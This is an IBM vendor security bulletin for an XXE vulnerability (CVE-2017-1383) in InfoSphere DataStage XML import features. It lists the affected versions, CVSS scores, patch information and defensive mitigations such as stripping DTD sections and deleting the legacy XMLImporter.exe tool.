Security Bulletin: IBM InfoSphere Information Server is potentially vulnerable to XML External Entity Injection (XXE)

Summary

An XML External Entity Injection (XXE) vulnerability in IBM InfoSphere Information Server potentially can be used by an attacker to retrieve sensitive documents.

Importing from the DataStage Designer Client is a feature that enables users to migrate DataStage assets from one system to another or from one project to another in the same system.
Examples:
• Migrating Jobs from a Development system to a Production system
• Performing DataStage version upgrades (i.e. v11.3 to v11.5)
• Sharing assets between DataStage users/teams

IBM DataStage supports three different formats to export DataStage objects:
• DSX (DataStage eXport format)
• XML
• ISX

There is a potential vulnerability when existing DataStage assets are imported via XML.
The DataStage Intelligent Assistants functionality creates and uses XML files, and hence it is also vulnerable.
A legacy tool XMLImporter.exe is also vulnerable. This tool is no longer used and can be removed.

Likewise, there is a potential vulnerability in XML Plugin’s metadata import operations.

Vulnerability Details

CVEID: CVE-2017-1383 DESCRIPTION: IBM InfoSphere Information Server is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.
CVSS Base Score: 7.1
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/127155 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L)

Affected Products and Versions

The following products, running on all supported platforms, are affected:
IBM InfoSphere DataStage: versions 9.1, 11.3, 11.5 and 11.7
IBM InfoSphere Information Server on Cloud: version 11.5

Remediation/Fixes

For DataStage import operations:

VRMF

|

APAR

|

Remediation/First Fix

—|—|—

11.7

|

JR57932

|

--A fix is not needed

11.5

|

JR57932

|

--Apply DataStage Security patch

11.3

|

JR57932

|

--Upgrade to a release where this issue is addressed.

9.1 | JR57932 | --Upgrade to a release where this issue is addressed.

For other components and releases, see the Workarounds and Mitigations section.

Workarounds and Mitigations

Mitigation Steps:

DataStage import operations

Note: See Remediation/Fixes section for available fixes.

For releases other than 11.7, if a published fix is not applied:
• Limit import of DataStage assets to DSX (Default) or ISX formats, only.
• If XML format is used for import, manually check the XML file before importing the file to determine if there is a DTD / DOCTYPE section. DTD sections are optional in DataStage XML files, and if present, can be safely removed before importing.
• Additionally, use the istools command line utility that supports both export and import in ISX format.
Examples on the use of istools command line utility can be found in the links below:
•https://www.ibm.com/support/knowledgecenter/en/SSZJPZ_11.5.0/com.ibm.swg.im.iis.productization.iisinfsv.migrate.doc/topics/a_exporting_projects.html
•https://www.ibm.com/support/knowledgecenter/en/SSZJPZ_11.5.0/com.ibm.swg.im.iis.iisinfsv.assetint.nav.doc/containers/istool_container_topic.html
•https://www.ibm.com/support/knowledgecenter/en/SSZJPZ_11.3.0/com.ibm.swg.im.iis.iisinfsv.assetint.doc/topics/istoolimp.html
•www.redbooks.ibm.com/redbooks/pdfs/sg247830.pdf Pg. 50 – Pg. 54

DataStage Intelligent Assistants

Intelligent assistant functionality is described here:
https://www.ibm.com/support/knowledgecenter/SSZJPZ_11.5.0/com.ibm.swg.im.iis.ds.design.doc/topics/c_ddesref_Intelligent_Assistants.html
The section “Creating a template from a job” explains where Templates are stored. The default location is Clients\Classic\Assistants\Generation\templates<language>.
Before using a Template, manually check the underlying XML file before importing the file to determine if there is a DTD / DOCTYPE section. DTD sections are not required in Template XML files, and if present, can be safely removed before using.

Legacy tool XMLImporter.exe

The tool XMLImporter.exe can be found in the Clients\Classic directory.
As installed, it cannot be used, but can be made to work with sufficient internals knowledge.
It serves no useful function and should be deleted from systems.
Important: There are several similarly named executables which are not subject to this security bulletin. Please ensure to only delete the executable named XMLImporter.exe.

_XML _Metadata importer operations for XML Input and XML Output plugin stages

XML Metadata Importer is used to create table definitions from XML sources i.e. XML Schemas and XML documents. IBM recommends manually checking the XML file content before importing the file. If there is a DTD / DOCTYPE section, verify its contents for any vulnerabilities.

DTD sections are required in some XML files else the metadata imported may be incomplete which could be due to missing DTD Entities data.
XML Schema Definition (XSD) language is the current standard schema language for all XML documents and data. So, IBM recommends using XSD as an alternative to DTD.

Get Notified about Future Security Bulletins

Subscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html&gt;) to be notified of important product support alerts like this.

References

Complete CVSS v2 Guide
On-line Calculator v2

Complete CVSS v3 Guide
On-line Calculator v3

Off

Related Information

IBM Secure Engineering Web Portal
IBM Product Security Incident Response Blog

Acknowledgement

This vulnerability was reported to IBM by Goh Zhi Hao, Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore) of SEC Consult Vulnerability Lab.

Change History

30 July 2017: Original version published
31 July 2017: republished with no changes
04 August 2017: added information for DataStage Intelligent Assistants and XMLImporter
22 December 2017: DataStage import operations in Information Server 11.7 is not vulnerable
23 June 2020: Added fix information for DataStage import operations in various releases

*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

Disclaimer

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.

[{“Business Unit”:{“code”:“BU059”,“label”:“IBM Software w/o TPS”},“Product”:{“code”:“SSZJPZ”,“label”:“IBM InfoSphere Information Server”},“ARM Category”:[{“code”:“”,“label”:“”}],“Platform”:[{“code”:“PF002”,“label”:“AIX”},{“code”:“PF010”,“label”:“HP-UX”},{“code”:“PF016”,“label”:“Linux”},{“code”:“PF027”,“label”:“Solaris”},{“code”:“PF033”,“label”:“Windows”}],“Version”:“9.1;11.5;11.3;11.7”,“Line of Business”:{“code”:“LOB10”,“label”:“Data and AI”}}]